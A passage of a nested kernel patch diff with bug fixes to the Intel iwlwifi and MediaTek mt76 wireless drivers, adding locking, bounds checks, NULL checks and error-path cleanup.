+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (le32_to_cpu(rsp->status) != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+@@ -1821,6 +1826,11 @@ static ssize_t iwl_dbgfs_mem_write(struct file *file,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	if (iwl_rx_packet_payload_len(hcmd.resp_pkt) < sizeof(*rsp)) {
++		ret = -EIO;
++		goto out;
++	}
++
+ 	rsp = (void *)hcmd.resp_pkt->data;
+ 	if (rsp->status != DEBUG_MEM_STATUS_SUCCESS) {
+ 		ret = -ENXIO;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 1d46a2b345eb3..a29e685aac4ff 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -5518,7 +5518,10 @@ static bool iwl_mvm_mac_can_aggregate(struct ieee80211_hw *hw,
+ {
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 
+-	if (mvm->trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
++	if (mvm->trans->trans_cfg->device_family > IWL_DEVICE_FAMILY_BZ ||
++	    (mvm->trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_BZ &&
++	     !(CSR_HW_REV_TYPE(mvm->trans->hw_rev) == IWL_CFG_MAC_TYPE_GL &&
++	       mvm->trans->hw_rev_step == SILICON_A_STEP)))
+ 		return iwl_mvm_tx_csum_bz(mvm, head, true) ==
+ 		       iwl_mvm_tx_csum_bz(mvm, skb, true);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+index 49ca1e168fc5b..eee98cebbb46a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rx.c
+@@ -384,9 +384,10 @@ void iwl_mvm_rx_rx_mpdu(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 		 * Don't even try to decrypt a MCAST frame that was received
+ 		 * before the managed vif is authorized, we'd fail anyway.
+ 		 */
+-		if (vif->type == NL80211_IFTYPE_STATION &&
++		if (is_multicast_ether_addr(hdr->addr1) &&
++		    vif->type == NL80211_IFTYPE_STATION &&
+ 		    !mvmvif->authorized &&
+-		    is_multicast_ether_addr(hdr->addr1)) {
++		    ieee80211_has_protected(hdr->frame_control)) {
+ 			IWL_DEBUG_DROP(mvm, "MCAST before the vif is authorized\n");
+ 			kfree_skb(skb);
+ 			rcu_read_unlock();
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 97b67270f3847..a5356c0d91953 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -193,8 +193,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	 * Starting from Bz hardware, it calculates starting directly after
+ 	 * the MAC header, so that matches mac80211's expectation.
+ 	 */
+-	if (skb->ip_summed == CHECKSUM_COMPLETE &&
+-	    mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ) {
++	if (skb->ip_summed == CHECKSUM_COMPLETE) {
+ 		struct {
+ 			u8 hdr[6];
+ 			__be16 type;
+@@ -209,7 +208,7 @@ static int iwl_mvm_create_skb(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 			      shdr->type != htons(ETH_P_PAE) &&
+ 			      shdr->type != htons(ETH_P_TDLS))))
+ 			skb->ip_summed = CHECKSUM_NONE;
+-		else
++		else if (mvm->trans->trans_cfg->device_family < IWL_DEVICE_FAMILY_BZ)
+ 			/* mac80211 assumes full CSUM including SNAP header */
+ 			skb_postpush_rcsum(skb, shdr, sizeof(*shdr));
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 99768d6a60322..a0bf19b18635c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -565,7 +565,6 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x43F0, 0x1652, killer1650i_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650i_name),
+ 	IWL_DEV_INFO(0x43F0, 0x2074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0x43F0, 0x4070, iwl_ax201_cfg_qu_hr, NULL),
+-	IWL_DEV_INFO(0x43F0, 0x1651, killer1650s_2ax_cfg_qu_b0_hr_b0, iwl_ax201_killer_1650s_name),
+ 	IWL_DEV_INFO(0xA0F0, 0x0070, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0074, iwl_ax201_cfg_qu_hr, NULL),
+ 	IWL_DEV_INFO(0xA0F0, 0x0078, iwl_ax201_cfg_qu_hr, NULL),
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 0a9af1ad1f206..171b6bf4a65a0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -599,7 +599,6 @@ static int iwl_pcie_set_hw_ready(struct iwl_trans *trans)
+ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ {
+ 	int ret;
+-	int t = 0;
+ 	int iter;
+ 
+ 	IWL_DEBUG_INFO(trans, "iwl_trans_prepare_card_hw enter\n");
+@@ -616,6 +615,8 @@ int iwl_pcie_prepare_card_hw(struct iwl_trans *trans)
+ 	usleep_range(1000, 2000);
+ 
+ 	for (iter = 0; iter < 10; iter++) {
++		int t = 0;
++
+ 		/* If HW is not ready, prepare the conditions to check again */
+ 		iwl_set_bit(trans, CSR_HW_IF_CONFIG_REG,
+ 			    CSR_HW_IF_CONFIG_REG_PREPARE);
+@@ -1522,19 +1523,16 @@ static int iwl_pcie_d3_handshake(struct iwl_trans *trans, bool suspend)
+ 	struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans);
+ 	int ret;
+ 
+-	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210) {
++	if (trans->trans_cfg->device_family == IWL_DEVICE_FAMILY_AX210)
+ 		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+ 				    suspend ? UREG_DOORBELL_TO_ISR6_SUSPEND :
+ 					      UREG_DOORBELL_TO_ISR6_RESUME);
+-	} else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ) {
++	else if (trans->trans_cfg->device_family >= IWL_DEVICE_FAMILY_BZ)
+ 		iwl_write32(trans, CSR_IPC_SLEEP_CONTROL,
+ 			    suspend ? CSR_IPC_SLEEP_CONTROL_SUSPEND :
+ 				      CSR_IPC_SLEEP_CONTROL_RESUME);
+-		iwl_write_umac_prph(trans, UREG_DOORBELL_TO_ISR6,
+-				    UREG_DOORBELL_TO_ISR6_SLEEP_CTRL);
+-	} else {
++	else
+ 		return 0;
+-	}
+ 
+ 	ret = wait_event_timeout(trans_pcie->sx_waitq,
+ 				 trans_pcie->sx_complete, 2 * HZ);
+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index d147dc698c9db..4b6cb3aee8487 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -577,7 +577,9 @@ free:
+ free_skb:
+ 	status.skb = tx_info.skb;
+ 	hw = mt76_tx_status_get_hw(dev, tx_info.skb);
++	spin_lock_bh(&dev->rx_lock);
+ 	ieee80211_tx_status_ext(hw, &status);
++	spin_unlock_bh(&dev->rx_lock);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index d8216243b0224..1fc2fe61ef773 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -908,10 +908,11 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ 
+ #define mt76_poll(dev, ...) __mt76_poll(&((dev)->mt76), __VA_ARGS__)
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout);
+-
+-#define mt76_poll_msec(dev, ...) __mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int kick);
++#define __mt76_poll_msec(...)         ____mt76_poll_msec(__VA_ARGS__, 10)
++#define mt76_poll_msec(dev, ...)      ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__, 10)
++#define mt76_poll_msec_tick(dev, ...) ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
+ 
+ void mt76_mmio_init(struct mt76_dev *dev, void __iomem *regs);
+ void mt76_pci_disable_aspm(struct pci_dev *pdev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 70a7f84af0282..12e0af52082a6 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1279,8 +1279,11 @@ void mt7603_mac_add_txs(struct mt7603_dev *dev, void *data)
+ 	if (wcidx >= MT7603_WTBL_STA || !sta)
+ 		goto out;
+ 
+-	if (mt7603_fill_txs(dev, msta, &info, txs_data))
++	if (mt7603_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mt76_hw(dev), sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index 51a968a6afdc9..eafa0f204c1f8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1530,8 +1530,11 @@ static void mt7615_mac_add_txs(struct mt7615_dev *dev, void *data)
+ 	if (wcid->phy_idx && dev->mt76.phys[MT_BAND1])
+ 		mphy = dev->mt76.phys[MT_BAND1];
+ 
+-	if (mt7615_fill_txs(dev, msta, &info, txs_data))
++	if (mt7615_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mphy->hw, sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+@@ -2352,7 +2355,7 @@ void mt7615_coredump_work(struct work_struct *work)
+ 			break;
+ 
+ 		skb_pull(skb, sizeof(struct mt7615_mcu_rxd));
+-		if (data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
++		if (!dump || data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
+ 			dev_kfree_skb(skb);
+ 			continue;
+ 		}
+@@ -2362,6 +2365,8 @@ void mt7615_coredump_work(struct work_struct *work)
+ 
+ 		dev_kfree_skb(skb);
+ 	}
+-	dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
+-		      GFP_KERNEL);
++
++	if (dump)
++		dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
++			      GFP_KERNEL);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index aed4ee95fb2ec..82aac0a04655f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -537,7 +537,8 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	if (txwi[2] & cpu_to_le32(MT_TXD2_FIX_RATE)) {
+ 		/* Fixed rata is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+-		bool multicast = is_multicast_ether_addr(hdr->addr1);
++		bool multicast = ieee80211_is_data(hdr->frame_control) &&
++				 is_multicast_ether_addr(hdr->addr1);
+ 		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
+ 							multicast);
+ 		u32 val = MT_TXD6_FIXED_BW;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index d106cbfc387c8..b678820ba6327 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1632,8 +1632,16 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	req->channel_min_dwell_time = cpu_to_le16(duration);
+ 	req->channel_dwell_time = cpu_to_le16(duration);
+ 
+-	req->channels_num = min_t(u8, sreq->n_channels, 32);
+-	req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	if (sreq->n_channels == 0 || sreq->n_channels > 64) {
++		req->channel_type = 0;
++		req->channels_num = 0;
++		req->ext_channels_num = 0;
++	} else {
++		req->channel_type = 4;
++		req->channels_num = min_t(u8, sreq->n_channels, 32);
++		req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	}
++
+ 	for (i = 0; i < req->channels_num + req->ext_channels_num; i++) {
+ 		if (i >= 32)
+ 			chan = &req->ext_channels[i - 32];
+@@ -1653,7 +1661,6 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 		}
+ 		chan->channel_num = scan_list[i]->hw_value;
+ 	}
+-	req->channel_type = sreq->n_channels ? 4 : 0;
+ 
+ 	if (sreq->ie_len > 0) {
+ 		memcpy(req->ies, sreq->ie, sreq->ie_len);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+index 82fdf6d794bcf..3c7c369d997ad 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.h
+@@ -962,9 +962,6 @@ enum {
+ 	DEV_INFO_MAX_NUM
+ };
+ 
+-#define MCU_UNI_CMD_EVENT                       BIT(1)
+-#define MCU_UNI_CMD_UNSOLICITED_EVENT           BIT(2)
+-
+ /* event table */
+ enum {
+ 	MCU_EVENT_TARGET_ADDRESS_LEN = 0x01,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+index d3f74473e6fb0..3e41d809ade39 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+@@ -631,8 +631,11 @@ void mt76x02_send_tx_status(struct mt76x02_dev *dev,
+ 
+ 	mt76_tx_status_unlock(mdev, &list);
+ 
+-	if (!status.skb)
++	if (!status.skb) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_ext(mt76_hw(dev), &status);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ 	if (!len)
+ 		goto out;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/init.c b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+index a80ae31e7abff..0d8bc7b06a46b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/init.c
+@@ -90,6 +90,7 @@ static ssize_t mt7915_thermal_temp_store(struct device *dev,
+ 	     val < phy->throttle_temp[MT7915_CRIT_TEMP_IDX])) {
+ 		dev_err(phy->dev->mt76.dev,
+ 			"temp1_max shall be greater than temp1_crit.");
++		mutex_unlock(&phy->dev->mt76.mutex);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -145,8 +146,11 @@ mt7915_thermal_set_cur_throttle_state(struct thermal_cooling_device *cdev,
+ 	u8 throttling = MT7915_THERMAL_THROTTLE_MAX - state;
+ 	int ret;
+ 
+-	if (state > MT7915_CDEV_THROTTLE_MAX)
++	if (state > MT7915_CDEV_THROTTLE_MAX) {
++		dev_err(phy->dev->mt76.dev,
++			"please specify a valid throttling state\n");
+ 		return -EINVAL;
++	}
+ 
+ 	if (state == phy->cdev_state)
+ 		return 0;
+@@ -175,7 +179,7 @@ static void mt7915_unregister_thermal(struct mt7915_phy *phy)
+ 	struct wiphy *wiphy = phy->mt76->hw->wiphy;
+ 
+ 	if (!phy->cdev)
+-	    return;
++		return;
+ 
+ 	sysfs_remove_link(&wiphy->dev.kobj, "cooling_device");
+ 	thermal_cooling_device_unregister(phy->cdev);
+@@ -200,6 +204,10 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 			phy->cdev = cdev;
+ 	}
+ 
++	/* initialize critical/maximum high temperature */
++	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = MT7915_CRIT_TEMP;
++	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = MT7915_MAX_TEMP;
++
+ 	if (!IS_REACHABLE(CONFIG_HWMON))
+ 		return 0;
+ 
+@@ -208,10 +216,6 @@ static int mt7915_thermal_init(struct mt7915_phy *phy)
+ 	if (IS_ERR(hwmon))
+ 		return PTR_ERR(hwmon);
+ 
+-	/* initialize critical/maximum high temperature */
+-	phy->throttle_temp[MT7915_CRIT_TEMP_IDX] = 110;
+-	phy->throttle_temp[MT7915_MAX_TEMP_IDX] = 120;
+-
+ 	return 0;
+ }
+ 
+@@ -1111,7 +1115,6 @@ static void mt7915_stop_hardware(struct mt7915_dev *dev)
+ 		mt7986_wmac_disable(dev);
+ }
+ 
+-
+ int mt7915_register_device(struct mt7915_dev *dev)
+ {
+ 	struct ieee80211_hw *hw = mt76_hw(dev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+index e58650bbbd14a..942d70c538254 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/mt7915.h
+@@ -72,6 +72,8 @@
+ 
+ #define MT7915_CRIT_TEMP_IDX		0
+ #define MT7915_MAX_TEMP_IDX		1
++#define MT7915_CRIT_TEMP		110
++#define MT7915_MAX_TEMP			120
+ 
+ struct mt7915_vif;
+ struct mt7915_sta;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index 686c9bbd59293..7303b690a64dc 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -1237,6 +1237,8 @@ static const struct of_device_id mt7986_wmac_of_match[] = {
+ 	{},
+ };
+ 
++MODULE_DEVICE_TABLE(of, mt7986_wmac_of_match);
++
+ struct platform_driver mt7986_wmac_driver = {
+ 	.driver = {
+ 		.name = "mt7986-wmac",
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index d1f10f6d9adc3..fd57c87a29ae3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -66,6 +66,24 @@ static void mt7921_dma_prefetch(struct mt7921_dev *dev)
+ 
+ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ {
++	/* disable WFDMA0 */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
++		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
++		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
++		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
++
++	if (!mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++				 MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++				 MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1))
++		return -ETIMEDOUT;
++
++	/* disable dmashdl */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
++		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
++	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
++
+ 	if (force) {
+ 		/* reset */
+ 		mt76_clear(dev, MT_WFDMA0_RST,
+@@ -77,24 +95,6 @@ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ 			 MT_WFDMA0_RST_LOGIC_RST);
+ 	}
+ 
+-	/* disable dmashdl */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
+-		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
+-	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
+-
+-	/* disable WFDMA0 */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
+-		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
+-		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
+-		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+-
+-	if (!mt76_poll(dev, MT_WFDMA0_GLO_CFG,
+-		       MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
+-		       MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 1000))
+-		return -ETIMEDOUT;
+-
+ 	return 0;
+ }
+ 
+@@ -301,6 +301,10 @@ void mt7921_dma_cleanup(struct mt7921_dev *dev)
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+ 
++	mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++			    MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++			    MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1);
++
+ 	/* reset */
+ 	mt76_clear(dev, MT_WFDMA0_RST,
+ 		   MT_WFDMA0_RST_DMASHDL_ALL_RST |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/init.c b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+index d4b681d7e1d22..f2c6ec4d8e2ee 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/init.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/init.c
+@@ -162,12 +162,12 @@ mt7921_mac_init_band(struct mt7921_dev *dev, u8 band)
+ 
+ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ {
+-	struct mt7921_fw_features *features = NULL;
+ 	const struct mt76_connac2_fw_trailer *hdr;
+ 	struct mt7921_realease_info *rel_info;
+ 	const struct firmware *fw;
+ 	int ret, i, offset = 0;
+ 	const u8 *data, *end;
++	u8 offload_caps = 0;
+ 
+ 	ret = request_firmware(&fw, fw_wm, dev);
+ 	if (ret)
+@@ -199,7 +199,10 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ 		data += sizeof(*rel_info);
+ 
+ 		if (rel_info->tag == MT7921_FW_TAG_FEATURE) {
++			struct mt7921_fw_features *features;
++
+ 			features = (struct mt7921_fw_features *)data;
++			offload_caps = features->data;
+ 			break;
+ 		}
+ 
+@@ -209,7 +212,7 @@ u8 mt7921_check_offload_capability(struct device *dev, const char *fw_wm)
+ out:
+ 	release_firmware(fw);
+ 
+-	return features ? features->data : 0;
++	return offload_caps;
+ }
+ EXPORT_SYMBOL_GPL(mt7921_check_offload_capability);
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/main.c b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+index 744382be36f8b..b2366efd74ea5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/main.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/main.c
+@@ -1705,7 +1705,7 @@ static void mt7921_ctx_iter(void *priv, u8 *mac,
+ 	if (ctx != mvif->ctx)
+ 		return;
+ 
+-	if (vif->type & NL80211_IFTYPE_MONITOR)
++	if (vif->type == NL80211_IFTYPE_MONITOR)
+ 		mt7921_mcu_config_sniffer(mvif, ctx);
+ 	else
+ 		mt76_connac_mcu_uni_set_chctx(mvif->phy->mt76, &mvif->mt76, ctx);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 7253ce90234ef..087a5dc2593db 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -16,24 +16,6 @@ static bool mt7921_disable_clc;
+ module_param_named(disable_clc, mt7921_disable_clc, bool, 0644);
+ MODULE_PARM_DESC(disable_clc, "disable CLC support");
+ 
+-static int
+-mt7921_mcu_parse_eeprom(struct mt76_dev *dev, struct sk_buff *skb)
+-{
+-	struct mt7921_mcu_eeprom_info *res;
+-	u8 *buf;
+-
+-	if (!skb)
+-		return -EINVAL;
+-
+-	skb_pull(skb, sizeof(struct mt76_connac2_mcu_rxd));
+-
+-	res = (struct mt7921_mcu_eeprom_info *)skb->data;
+-	buf = dev->eeprom.data + le32_to_cpu(res->addr);
+-	memcpy(buf, res->data, 16);
+-
+-	return 0;
+-}
+-
+ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 			      struct sk_buff *skb, int seq)
+ {
+@@ -60,8 +42,6 @@ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 	} else if (cmd == MCU_EXT_CMD(THERMAL_CTRL)) {
+ 		skb_pull(skb, sizeof(*rxd) + 4);
+ 		ret = le32_to_cpu(*(__le32 *)skb->data);
+-	} else if (cmd == MCU_EXT_CMD(EFUSE_ACCESS)) {
+-		ret = mt7921_mcu_parse_eeprom(mdev, skb);
+ 	} else if (cmd == MCU_UNI_CMD(DEV_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(BSS_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(STA_REC_UPDATE) ||
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index 5c23c827abe47..aa4ecf008a3c9 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -115,9 +115,10 @@ static void mt7921e_unregister_device(struct mt7921_dev *dev)
+ 		napi_disable(&dev->mt76.napi[i]);
+ 	cancel_delayed_work_sync(&pm->ps_work);
+ 	cancel_work_sync(&pm->wake_work);
++	cancel_work_sync(&dev->reset_work);
+ 
+ 	mt7921_tx_token_put(dev);
+-	mt7921_mcu_drv_pmctrl(dev);
++	__mt7921_mcu_drv_pmctrl(dev);
+ 	mt7921_dma_cleanup(dev);
+ 	mt7921_wfsys_reset(dev);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -263,6 +264,7 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	struct mt76_dev *mdev;
+ 	u8 features;
+ 	int ret;
++	u16 cmd;
+ 
+ 	ret = pcim_enable_device(pdev);
+ 	if (ret)
+@@ -272,6 +274,11 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	pci_read_config_word(pdev, PCI_COMMAND, &cmd);
++	if (!(cmd & PCI_COMMAND_MEMORY)) {
++		cmd |= PCI_COMMAND_MEMORY;
++		pci_write_config_word(pdev, PCI_COMMAND, cmd);
++	}
+ 	pci_set_master(pdev);
+ 
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
+@@ -509,17 +516,7 @@ failed:
+ 
+ static void mt7921_pci_shutdown(struct pci_dev *pdev)
+ {
+-	struct mt76_dev *mdev = pci_get_drvdata(pdev);
+-	struct mt7921_dev *dev = container_of(mdev, struct mt7921_dev, mt76);
+-	struct mt76_connac_pm *pm = &dev->pm;
+-
+-	cancel_delayed_work_sync(&pm->ps_work);
+-	cancel_work_sync(&pm->wake_work);
+-
+-	/* chip cleanup before reboot */
+-	mt7921_mcu_drv_pmctrl(dev);
+-	mt7921_dma_cleanup(dev);
+-	mt7921_wfsys_reset(dev);
++	mt7921_pci_remove(pdev);
+ }
+ 
+ static DEFINE_SIMPLE_DEV_PM_OPS(mt7921_pm_ops, mt7921_pci_suspend, mt7921_pci_resume);
